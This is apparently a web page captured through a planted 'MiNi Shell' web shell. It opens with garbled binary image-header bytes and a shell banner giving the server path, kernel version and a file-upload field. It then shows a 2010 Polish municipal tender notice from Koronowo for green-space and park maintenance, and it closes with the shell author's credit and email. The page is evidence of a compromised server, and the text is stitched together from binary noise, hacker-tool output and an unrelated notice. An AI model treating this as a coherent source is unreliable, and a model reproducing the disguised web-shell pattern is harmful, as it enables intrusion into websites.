JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100412/101450-N-2010.html

<p class="kh_header"><b>Koronowo: Utrzymanie zieleni miejskiej i czystości na terenach zieleni parkowej i przyulicznej na terenie miasta Koronowa</b><br>
<b>Numer ogłoszenia: 101450 - 2010; data zamieszczenia: 12.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Koronowo , Plac Zwycięstwa 1, 86-010 Koronowo, woj. kujawsko-pomorskie, tel. 052 3826400, faks 052 3826401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koronowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zieleni miejskiej i czystości na terenach zieleni parkowej i przyulicznej na terenie miasta Koronowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie i pielęgnacja  zieleni miejskiej i czystości w trzech strefach, których<br> zakres, lokalizację<br> i powierzchnie ( m2 ) określono w załączniku Nr 1<br>
Rodzaj i zakres robót objętych ryczałtowym bieżącym utrzymaniem opisuje zał. Nr  2<br> Zakładana (szacunkowa) częstotliwość wykonania prac zawarta jest w załączniku Nr 3 -formularz cenowy<br>
Warunki realizacji zamówienia określone zostały w projekcie umowy stanowiącym zał. Nr 4 <br>
Załącznik nr 1<br>
Rejony utrzymania zieleni  miejskiej 
i czystości na terenach zieleni parkowej i przyulicznej<br>
Teren miasta Koronowa został podzielony na 3 strefy utrzymania zieleni miejskiej na terenach zieleni parkowej i przyulicznej, <br>

Strefa A   - Plac Zwycięstwa teren o  powierzchni 500 m2 <br>
		
skwer przy kościele św. Andrzeja  - powierzchnia 1880 m2<br>

Strefa B    - skwer przy ul. Paderewskiego-Garncarska - powierzchnia 572 m2  <br>
	
park przy cmentarzu, ul. Farna - schody, teren zieleni przy schodach
i przy ulicy  - powierzchnia 2350 m2<br>                                                                               

skwer przy parkingu ul. Pomianowskiego - powierzchnia 540 m2<br>

skwer	przy miasteczku komunikacyjnym, miasteczko komunikacyjne                                                                               -   powierzchnia 2166 m2<br>
Strefa C   - teren nad Brdą ul. Bydgoska - powierzchnia 560 m2, <br>

skwer ul. Bydgoska - powierzchnia 288 m2,<br>

skwer ul. Poprzeczna - powierzchnia 800m2,<br>

kanał ulgi - powierzchnia 1500m2<br><br>                                   


Załącznik nr 2<br>
                                                                                       
Rodzaj i zakres rzeczowy usług objętych przetargiem do wykonania w ciągu roku budżetowego 2010 w miesiącach od marca do października  <br>
 
1.Wygrabienie liści i zanieczyszczeń z trawników:<br>
   a) w sezonie wiosennym   (1-krotnie)                                                             12156   m2<br>
   b) w sezonie jesiennym     (1-krotnie)                                                               3720  m2<br>
   c) w sezonie jesiennym     (2-krotnie)                                                                8436  m2<br>

2. Pielęgnacja trawników  obejmująca w ciągu roku:<br>
    a) koszenie trawników na powierzchni <br>
dla strefy A maksymalna wysokość trawy 8 cm                    3380 m2<br>
dla strefy B maksymalna wysokość trawy 10  cm         5628 m2<br>
dla strefy C maksymalna wysokość trawy 14 cm                3148  m2<br>
		                                      
    b)  nawożenie mineralne,  (polifoska w dawce 20 g/m2)                                   3380 m2<br>
    c)  założenie trawnika dywanowego z wybraniem i wywozem warstwy
        ziemi nieurodzajnej do 10 cm grubości, dowozem i rozścieleniem 
        ziemi urodzajnej warstwą grubości 10 cm, kat. gruntu III, siewem
        przy uprawie ręcznej, z nawożeniem azofoską w dawce 50 g/m2,                 200 m2<br>
   

3. Pielęgnacja żywopłotów formowanych:<br>
   a)  3-krotne przycięcie z trzech stron                                                                   350 m2             <br>
   b)  wiosenne wygrabienie liści z żywopłotów                                                     350 m2<br>                                                             
   c)  jesienne wygrabienie liści z żywopłotów                                                       350 m2  <br>
   d)  2-krotne odchwaszczenie żywopłotów                                                           350 m2<br>
   e) 1-krotne nawożenie mineralne żywopłotów (polifoska 50 g/m2)                    350 m2<br>
 
4. Pielęgnacja krzewów: <br>
   a) 2-krotne cięcia pielęgnacyjne przy średnicy korony   80-150 cm                      40 szt.         <br>
                                                   przy średnicy korony  ponad 150 cm                      16 szt.<br>
    b) wiosenne wygrabienie liści ze skupin krzewów                                             1000 m2 <br>
    c) jesienne wygrabienie liści ze skupin krzewów                                               1000  m2<br>
    d) 2-krotne odchwaszczenie skupin krzewów                                                     1000 m2 <br>
    e) podlewanie drzew lub skupin krzewów w dawce 10 l/szt. z  dowozem wody  60 szt. <br>
    f) pielęgnacja i przycinanie rabaty z róż                                                                 40 m2<br>

5.Pielęgnacja drzew  łącznie z pracami porządkowo-transportowymi 
     (zagospodarowaniem drewna i odpadów):<br>
    a)  przycięcie drzew w pierwszych latach po posadzeniu:                                       20 szt. <br>                           
    b)  cięcia pielęgnacyjno-sanitarne drzew o średnicy pnia na wysokości 130 cm:
                                                                                   11-20 cm                                      5 szt.  <br>
                                                                                   21-40 cm                                      5  szt. <br>
                                                                                   ponad 40 cm                                10 szt. <br>

    c)  cięcia redukcyjne koron drzew o średnicy pnia na wysokości 130 cm:<br>
                                                                                    11-20 cm                                    10 szt.<br>
                                                                                    21-40 cm                                    10 szt. <br>                                                                                                                                                                                     
                                                                                    41-65 cm                                    10 szt. <br>
                                                                              ponad  65 cm                                    10 szt. <br>
    d)  karczowanie krzewów o średnicy korony do 1 m                                                 10 szt. <br>
    e)  karczowanie krzewów o średnicy korony ponad 1 m                                             5 szt. <br>
    f)  ścinanie drzew  wraz z frezowaniem pniaków
         przy średnicy pni drzew na wysokości 130 cm:  <br>         do  5 cm                             1 szt.<br>
                                                                                      6-20 cm                                           1 szt.<br>
                                                                                    21-40 cm                                           1 szt.<br>
                                                                                    41-65 cm                                           1 szt. <br>
                                                                            ponad    65 cm                                           5 szt.  <br>

  g) karczowanie  pniaków po ściętych drzewach na głębokość 40 cm  z zasypaniem
dołu ziemią żyzną i wywozem pozyskanej masy, przy średnicy
          pniaka na wysokości ścięcia:    <br>                           do 10 cm                                       1 szt.<br>
                                                                                     11 - 30 cm                                       1 szt.<br>
                                                                                     31 -  60 cm                                       2 szt.<br>
                                                                                     61 -100 cm                                      5 szt.<br>
                                                                                  ponad 100 cm                                      5 szt.<br>

6.  Sadzenie drzew liściastych form piennych w gruncie  kat. III z zaprawą  dołów 
     do połowy głębokości ziemią kompostową i opalikowaniem drzewek                         20  szt.<br>
7.  Sadzenie krzewów liściastych form naturalnych w gr. kat. III z zaprawą 
      dołów do połowy głębokości ziemią kompostową                                                        10  szt.<br>        
8.  Sadzenie drzew i krzewów iglastych w gr. kat. III z zaprawą dołów 
      ziemią kompostową                                                                                                        10  szt.<br>
9.  Ustawienie przy drzewie 1 szt. pala wraz z zamocowaniem do drzewka taśmą
(sznurem)                                                                                                                        20  szt.<br>
10. Sadzenie krzewów żywopłotowych w rowach o szer. 45 cm z zaprawą
      rowów do połowy głębokości ziemią kompostową                                                       100 szt. <br>
11. Przygotowanie rabat (kwietników) i pojemników kwiatowych do obsadzenia 
      i obsadzenie roślinami (pelargonia wielkokwiatowa - 100 m2, begonia - 20 m2,
        aksamitka - 5 m2)                                                                                                        125 m2 <br>       
12. Bieżąca pielęgnacja kwiatów w pojemnikach  i na rabatach  przez okres 6 m-cy
      (pielenie, nawożenie mineralne,  uzupełnianie roślin (do 10%), podlewanie,
      usuwanie przekwitłych kwiatostanów, likwidacja nasadzeń wraz z wyrównaniem 
      powierzchni, usunięcie pojemników i przechowanie przez   okres zimowy)               125 m2<br>
13. Oczyszczenie krawężników z darni                                                                               250 m   <br>               
14. Oczyszczenie z darni chodników o nawierzchni z płyt betonowych i kostki 
      brukowej                                                                                                                        200 m2<br>
15.  Oczyszczanie z wszelkich zanieczyszczeń alejek, chodników i schodów
        z kostki betonowej                                                                                                       2350 m2<br>
16. Oczyszczenie alejek żwirowych z darni i chwastów                                                     820 m2<br>
17. Naprawa ławek (wymiana do 3 elementów) z pomalowaniem całości                           20 szt.<br>
18. Malowanie  ławek  (dwukrotne) farbą olejną lub drewnochronem 
     (siedzisk drewnianych i podstaw metalowych)                                                               84 szt. <br>
19. Oczyszczanie obiektów parkowych <br>
	Obszar całego obiektu, to jest: trawniki, kwietniki, skupiny krzewów, alejki, przejścia i schody, 	muszą być utrzymane poprzez:<br>
1.Usunięcie wszelkich widocznych nieczystości, takich jak: papiery, folie, kubki plasti­kowe, kamienie, kapsle, skupiska niedopałków, drobne gałęzie, itp.<br>
2.Oczyszczanie alejek, polegające na:<br>
a) w okresie letnim (01.04 - 31.10):
wygrabianiu nieczystości i wyrównywaniu na bieżąco nierówności alejek gruntowych (szczególnie wokół ławek ),
usuwaniu nieczystości i piasku poprzez zamiatanie schodów i alejek utwardzonych,<br>

b) w okresie zimowym (01.11 - 31.03):
usuwaniu nieczystości.<br>
3. Kosze, ławki bądź inne urządzenia przestawione lub przewrócone należy ponownie ustawić w miejsca na to wyznaczone. <br>



     W poszczególnych strefach utrzymania czystości Wykonawca musi gwarantować bieżące usuwanie nieprawidłowości porządkowych w czasie nie dłuższym niż 1 tydzień. W przypadku pojawienia się nagłych odpadów, wpływających znacznie na obniżenie wizerunku otoczenia, niezwłocznie oczyszczenie - po zgłoszeniu przez inspektora. <br>



           
Uwaga: W  cenie   oferty  należy  uwzględnić  wartość  wszystkich  materiałów  niezbędnych  do    
              wykonania  robót   -   za  wyjątkiem   sadzonek   drzew  i    krzewów,   które   dostarczy   
             zamawiający,  a  także  koszty transportu materiałów, sprzętu i pracowników oraz koszt    
             zebrania i wywozu odpadów roślinnych, które winny być przekazane do kompostowania.<br>
          
Przewidywana do wykonania ilość i krotność robót określona została jako średnioroczna i służy wyłącznie do wyliczenia ceny oferty.<br>
Ilość i krotność wykonywanych robót  w trakcie realizacji umowy może ulec zmianie w zależności  od warunków atmosferycznych i związanego z tym tempa wzrostu roślin oraz od stanu i wyglądu terenu. Zmiany te nie mogą jednak  spowodować przekroczenia wartości łącznego wynagrodzenia wykonawcy określonego w umowie. <br>.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających polegających                      na wykonaniu tego samego rodzaju zamówienia, co objęte zamówieniem podstawowym. Łączna wartość zamówień uzupełniających w stosunku do zamówienia nie może przekroczyć wartości wyrażonej procentem i przepisem Prawa zamówień publicznych.
Na okoliczność zawarcia zamówienia uzupełniającego zostanie zawarta umowa w trybie zamówienia z wolnej ręki.
Informacja o udzieleniu zamówień uzupełniających nie jest zobowiązaniem  Zamawiającego do udzielenia takiego zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.31.41.00-5, 77.34.42.00-9, 77.30.00.00-3, 77.31.30.00-0, 77.31.20.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał usługi będące przedmiotem niniejszego postępowania,  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane należycie tj. <br>
-  co najmniej jednej usługi polegającej na utrzymaniu zieleni miejskiej w okresie wegetacyjnym roślin  o wartości co najmniej 30.000,00 zł. brutto.<br></p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje                    lub przedstawi  pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych                   do wykonania zamówienia  tj. wskażą:<br>
-	 co najmniej jedną osobę, która będzie uczestniczyć w wykonywaniu zamówienia tj. będzie odpowiedzialna za wykonanie przedmiotu zamówienia - legitymującą się kierunkowym przygotowaniem zawodowym ogrodniczym, co najmniej na poziomie średnim oraz posiadająca minimum 12 miesięczną praktyką przy utrzymaniu zieleni,<br>
-	 co najmniej 5 pracownikami przewidzianymi do wykonywania prac o charakterze technicznym.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Oświadczenie wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Pzp, wg wzoru okreslonego w załączniku Nr 6 do SIWZ.<br>
W przypadku składania oferty przez Wykonawców występujących wspólnie ww. oświadczenie składane jest łącznie.<br>
2)	Pełnomocnictwo określające jego zakres w przypadku, gdy wykonawcę reprezentuje pełnomocnik.<br>
Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza.<br>

Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia.
Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana postanowień niniejszej umowy dotycząca łącznego wynagrodzenia Wykonawcy określonego w § 8 ust. 1 jest dopuszczalna w przypadku ustawowej zmiany stawki podatku VAT dotyczącej robót objętych zamówieniem oraz w przypadku, gdy faktyczna ilość wykonanych robót będzie inna niż zakładana.<br>
2.Zmiana umowy wymaga formy pisemnej i musi być dokonana przez sporządzenie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.koronowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Koronowie   Ul. Plac Zwycięstwa 1, 86-010 Koronowo<br>
pokój nr 10 /parter/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2010 godzina 09:00, miejsce: Urząd Miejski w Koronowie   Ul. Plac Zwycięstwa 1, 86-010 Koronowo<br>
pokój nr 10 /parter/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com